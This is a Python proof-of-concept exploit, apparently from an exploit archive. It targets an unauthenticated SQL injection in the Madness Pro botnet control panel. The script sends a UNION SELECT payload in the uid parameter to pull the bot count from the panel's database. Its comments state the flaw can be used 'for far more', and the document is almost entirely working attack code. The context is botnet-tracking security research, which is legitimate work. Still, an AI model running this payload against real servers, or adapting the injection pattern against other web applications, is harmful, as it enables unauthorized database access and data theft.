Madness Pro 1.14 - SQL Injection

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
#              ▄▄▌        ▄▄▄▄·       ▄▄▄▄▄      • ▌ ▄ ·.  ▄· ▄▌
#              ██•  ▪     ▐█ ▀█▪▪     •██  ▪     ·██ ▐███▪▐█▪██▌
#              ██▪   ▄█▀▄ ▐█▀▀█▄ ▄█▀▄  ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪
#              ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.
#              .▀▀▀  ▀█▄▀▪·▀▀▀▀  ▀█▄▀▪ ▀▀▀  ▀█▄▀▪▀▀  █▪▀▀▀  ▀ •
#   ▄▄· ▄• ▄▌▄▄▄  ▪   ▐ ▄  ▄▄ •     • ▌ ▄ ·.  ▄▄▄· ·▄▄▄▄   ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·
#  ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪    ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.
#  ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄    ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
#  ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█    ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
#  ·▀▀▀  ▀▀▀ .▀  ▀▀▀▀▀▀ █▪·▀▀▀▀     ▀▀  █▪▀▀▀ ▀  ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀  ▀▀▀▀  ▀▀▀▀
#
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
#
# References:
#	http://blog.cylance.com/a-study-in-bots-lobotomy
#	
import urllib

# Fill in URL that Madness Pro bot connects back to
panel_url = ""


def run_sqli_proof_of_concept(panel_index_url):
    f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
                       "%20--%20--".format(panel_index_url))
    print f.read()

run_sqli_proof_of_concept(panel_url)